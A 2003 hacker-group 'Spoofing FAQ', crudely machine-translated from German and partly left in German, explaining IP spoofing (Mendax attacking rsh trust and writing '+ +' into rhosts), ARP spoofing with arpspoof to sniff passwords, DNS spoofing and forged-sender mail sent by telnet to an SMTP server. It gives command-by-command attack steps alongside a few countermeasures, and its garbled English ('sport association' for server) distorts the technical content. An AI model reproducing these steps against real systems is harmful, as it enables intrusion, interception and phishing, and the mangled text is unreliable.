Continued:
=======
Has Been Translated from German to English , Some Parts are still in german Will Update it when I Get the Chance you Can Find the thread here <<Az Well az the tools, Source , Etc.... to be updated.
_________________ ___________/_____/\_ ___ \ \ _
_____//\ ___/ \ \/ | __) \ \ _ \ \ \____| \ \______ /\______ /\___/\/\/\/The German computer Freaks
www.gcf.de Since 1997
--------------------------------------------------------------------------------
Spoofing FAQ
Author: Flo
Mail: flo@ec security.com
--------------------------------------------------------------------------------
1. What is Spoofing?
2. IP Spoofing
3. ARP Spoofing
4. DNS Spoofing
5. Mail Spoofing
6. Conclusion
1. What is Spoofing?
By Spoofing one understands ton falsify the kind OF at aggressor OF of packages in look for A way into the traditional scythe that they carry the return ADDRESS OF more another (sometimes trustworthy) host. But nowadays this definition is considered as NO of longer UP ton DATES. The old definition which extended and enclosure now all methods, with which Authentifizierungs and identification of procedures CAN undermined, which acres based on the use OF trustworthy addresses or host of names.
Into the following one I wants unite Spoofing of techniques more near ton light UP. In addition belong:
- IP Spoofing
- ARP Spoofing
- DNS Spoofing
- Mail Spoofing
2. IP Spoofing
The probably most wave known Spoofing technology, which among OTHER things Kevin Mitnick, ton which probably most wave known Cracker OF the world rendered, good services. Generally one could DEFINES IP Spoofing as A technology OF the pretense OF A wrong return ADDRESS, which intends usually, by the gespoofte return ADDRESS ton authentifiziert. RK the beginning quietly some fundamentally things:
3-Way-Handshake:
One call the proceeding OF A TCP connection establishment 3-Way-Handshake, since he always run off in 3 steps.
Client (trustworthy host): Cl
Server: Sport association
TCP packing with set SYN flag: S
TCP packing with set ACK flag: A
TCP packing with set SYN/ACK flag: S/A
Initially Sequence NUMBER: ISN
Cl -- S, ISN(Cl) > sport association sport
association -- S/A, ISN(Sv) ISN(Cl) > Cl Cl -- A, ISN(Sv) > sport
association
TCP flag:
Each package in A normally TCP connection has A CLEAR function. Therefore RK leases one flag is set in each normally TCP connection. TCP flag of acres into the remainder of OF A component OF the TCP header. Here I wants deal only with 2 OF thesis flag:
on the one hand on the synchronisation flag (SYN) and on the OTHER hand on the acknowledgement flag (ACK). With the 3-Way-Handshake the Client sends roofridge A TCP package with set SYN flag ton the servers, in order ton communicate ton that one that it would like tons develop now A connection with the servers (Cl: "I would develop gladly A connection with you!"). If the servers receives this package, it answers with A TCP package with set SYN/ACK flag (server: "OK ONE NO problem. You understood ME?"). If the Client received now again this package, he sends A ACK package ton the servers, in order ton develop the connection now completely. (Cl: ", you understood!"). Now the connection is completely developed and DATA CAN into the context OF the meeting exchanged.
Sequence numbers:
Generally sequence numbers have ton fulfill 2 things within A TCP connection:
- MISSINGS of packages CAN determined and supplied more later
- the correct sequence OF the packages CAN restored
Case example:
The aggressor of tries ton of SWITCHES off now the Client(Cl) and pretend then its IP address. Switching the Clients off CAN managed with A Denial OF Service(DoS) attack. But now the heaviest part of comes:
The aggressor, that pretends now the IP address OF the Clients, sends A SYN package ton the Server(Sv), OF which on it A SYN/ACK sends package with the necessary ISN(Sv) into the emergency-hung, since the Client which PUT by the aggressor out OF action. The aggressor must guess now the ISN(Sv), which he must send with to A ACK package tons able in order ton develop the connection. In addition it develops before A perfectly connection ton the Server(Sv) unpreviligierte, in order ton of GET its current ISN. Now the aggressor must calculate snap if possible the necessary ISN, what is emergency more under any circumstances impossible, since there is A certain SAM-POLARIZES with the formation OF A ISN:
- the ISN is increased each second by 128000, if NO connections acres developed
- the ISN is increased each second by 64000, if A connection is developed
Note: One call this technology thus blindly IP Spoofing
Case example Mendax:
Mendax is A simple Tool, which CAN used for the regularization by TCP sequence numbers and for the rshd Spoofing. After Mendax which compiled and implemented, one of lake this on the screen:
$ /mendax
p HAVEN
s HAVEN
l username
r username
C COMMAND
w HAVEN
D
t
L TERM
S HAVEN
roofridge haven on local host clay/tone occupy
servers haven on < source > clay/tone swamp
user on < source >
user on < target >
COMMAND clay/tone execute
WAIT for A TCP SYN luggage on HAVEN haven
READ DATA from stdin and send it.
test more more whether attack might succeed
spoof rlogind instead OF rshd.
haven from which clay/tone of SAM POLARIZES ONE seq numbers.
Into this example I use of 3 fictitious computer:
- 80.20.30.40 as aggressor
- 80.20.30.41 as victims
- 80.20.30.42 as computer, whose ADDRESS OF the of aggressor pretends
On the computers OF the victim (80.20.30.41) is A hosts.equiv file, which permits rsh DATA traffic OF 80.20.30.42 (trusted host):
# /etc/hosts.equiv
local host 80.20.30.42
The goal OF the aggressor is tons implemented it now rsh Instruction on 80.20.30.41 (victims) as users OF 80.20.30.42 (trusted host), although it on possesses the IP address 80.20.30.40. If Mendax of states now that the goal host (80.20.30.41) is vulnerable, CAN implement it each desired Instruction on this. The standard Instruction, which is sent ton the victim (80.20.30.41), is following:
mV rhosts r; echo + + > rhosts
Thus the file rhosts on 80.20.30.41 (victims) is PUT on, which it makes possible for everyone ton of logs in from any host.
Now the aggressor (80.20.30.40) sends the following Instruction:
$ /mendax p 514 80.20.30.42 80.20.30.41 l test r test
This Instruction of arranges Mendax ton it tons hear A rsh requirement OF 80.20.30.42 (trusted host) tons rshd on the host OF the victim (80.20.30.41) as A user test. In addition Mendax PUTS trusted the host (80.20.30.42) with A Denial OF service (DOS) ton attack out OF action. Into this example Mendax SYN Flooding of uses, whereby the return ADDRESS OF the SYN of packages is falsified:
flooding SOURCE with TCP SYN packets from 1.2.3.4
Whereupon Mendax of analyzes the generation OF the sequence numbers OF the host OF the victim (80.20.30.41). After it found out, on which way the generation OF sequence NUMBERS OF the victim takes place, Mendax is deceptive rsh and of tries this Instruction ton implement:
using 64000 as prediction difference (3 hit).
spoofing rsh.
resetting TCP target connection: .
resetting SOURCE: ...................
After execution OF this Instruction the file rhosts into the listings users test on 80.20.30.41 (victims) is PUT on. If one regards times CONTENTS OF the file, it becomes nearly CLEAR one that now everyone CAN ACCESS the host OF the victim. A simple cat rhosts indicates CONTENTS ton this file:
+ +
Susceptible service/configurations:
- all r-services (e.g. rsh)
- all service/configurations, which use A IP Adressauthenfizierung
- Remote Procedure Call (RPC)
- the X Window system
Counter of measures:
- NO Authentifizierung by origin addresses
- employment OF SSH (Secure Shell), which makes look for Authentifizierung unnecessary
Tools:
- ipspoof.c
- Mendax
- seq_number.c
3. ARP Spoofing
The Address Resolution Protocol (ARP) is minutes, which responsible for the assignment from hardware ton of IP addresses if now A host needs A meeting, sends it A ARP Broadcast, which contains the IP address OF the desired host. Around this Broadcast ton avoid there acres the ARP Cache. Here the ARP information of becomes buffered, which one CAN rain pool of broadcasting corporationswith "arp A ".
Interface: 80.134.91.90 on interface 0x1000002
internet address physical ADDRESS type 80.132.221.126
20-53-52-43-00-00 dynamically
Expenditure for example OF arp A
The goal OF the ARP Spoofens is tons manipulated it now that ARP Cache. The aggressor maintains his hardware ADDRESS with this technology, wants more however the IP address OF A trustworthy host ton accept. In addition the aggressor of manipulates the Cache OF his victim by the dispatch OF wrong allocation information. Its if attack successfully run, from now tons of all packages OF the goal ton the hardware ADDRESS OF the aggressor of acres LED. Because the goal believes, the computers OF the aggressor is the trustworthy host.
Case example arpspoof:
Like the name is arpspoof A Tool already says, ton the ARP Spoofing which developed arpspoof is A part dsniff OF the package. But now ton the substantial one:
I use here again 3 fictitious system, which acres connected with A network SWITCH:
- the system gate with the IP address 10.1.1.1 functions as standard gateway
- the system evil with the IP address 10.1.1.5 functions as at aggressor
- the system victim with the IP address 10.1.1.6 functions as A victim
As the roofridge the aggressor (evil)needs the hardware of addresses OF the of system gate and victim, which acres necessary for the execution OF arpspoof. In order ton reach this, must implement evil (10.1.1.5) two Ping Instructions:
[ evil ] ping gate
PING 10.1.1.1 from 10.1.1.5: 56(84) byte OF DATA.
64 bytes from 10.1.1.1: icmp_seq=0 ttl=128 time=1.3 ms
[ evil ] ping victim
PING 10.1.1.6 from 10.1.1.5: 56(84) byte OF DATA.
64 bytes from 10.1.1.6: icmp_seq=0 ttl=128 time=5.1 ms
Before the aggressor can begin now, system should be evil the ability to have all data pass on, so that the intercepted data achieve nevertheless still their goal. With the Tool ask-rout and the B1-Option can a simple IP forwarding be activated.
[ evil ] ask-rout -B1
So now it can loose-go. The aggressor implements now the following instruction:
[ evil ] arpspoof t 10.1.1.6 10.1.1.1
The whole data traffic is passed on by this instruction of victim (10.1.1.6) at gate (10.1.1.1) to the system of the aggressor(evil). This can now with the Sniffer of its choice the data traffic note and so e.g. at passwords arrive.
Disadvantages:
- The Cache entries lose usually to fast their validity. Therefore the aggressor would have to periodically again manipulate the ARP Cache of the victim.
- intelligent hardware (rout, Swit) can make such attacks ineffective
Counter measures:
- The static establishment of the Mappings (address assignments). One can settle this with the Tool arp:
arp s hostname hw_address
- Employment of the Tools Arpwatch. It respects auf Veränderungen der IP-/Ethernet-Mappings. Falls das Programm eine Veränderung bemerkt, wird man per E-Mail alamiert. Außerdem findet eine Protokollierung der Manipulationen statt.
Tools:
- arpspoof (Teil von dsniff)
- Arpwatch
- Ettercap
- fragrouter
4. DNS-Spoofing
Das Domain Name System (DNS) ist für die Zuweisung von IP-Adressen zu Hostnamen und umgekehrt zuständig. Bei dieser Technik des Spoofens dringt der Angreifer in den DNS-Server ein und ändert dort die Zuordnungstabellen von Hostnamen und IP-Adressen. Diese Änderungen werden in die Datenbanken mit den Übersetzungtabellen auf dem DNS-Server geschrieben. Fordert nun ein Client die Auflösung eines Hostnamens an, so erhält er eine gefälschte Adresse, welche die IP-Adresse eines Rechners ist, der sich unter der Kontrolle des Angreifers befindet. Jedoch kommt diese Art des Spoofens eher selten vor.
Gegenmaßnahmen:
- Einsatz des Script-Utilities DOC (Domain Obscenity Control)
Tools:
- DOC
- ERECT
- jizz
5. Mail-Spoofing
Unter Mail-Spoofing versteht man das Versenden einer Mail mit gefakter Absenderadresse. Um eine Mail mit gefälschter Absenderadresse zu schreiben folge man diesen Schritten:
Fallbeispiel Telnet:
1. telnet mailserver 25 (anstelle von mailserver die Adresse des anonymen SMTP-Servers eingeben)
2. Um uns zu identifizieren geben wir den Befehl HELO ID ein, wobei es vollkommen egal ist was man für ID eingibt.
3. MAIL FROM: < absenderadresse@gefaked >
4. RCPT TO: < empfaenger@dermail >
5. DATA
6. subject: Betreff
7. Nun können sie ihre Nachricht eingeben.
8. . (ja ein Punkt)
9. QUIT
Es gibt jedoch nur noch sehr wenige anonyme Mailserver, so dass man doch schon sehr lange suchen kann bis man einen findet. Die Alternative besteht darin sich einen eigenen anonymen SMTP-Server auf seinem PC einzurichten.
6. Schlusswort:
Als Autor dieses Dokuments übernehme ich keinerlei Haftung für die Taten der Leser. Ich bedanke mich bei den Leuten, die mich animiert haben dies zu schreiben. Außerdem danke ich den Autoren der Bücher, welche mich zu diesem Thema inspiriert haben.
Greets to:
Neonomicus
Marc Ruef
Daniel B.
--------------------------------------------------------------------------------
© 2003 by Flo
visit www.gcf.de & www.ec-security.com
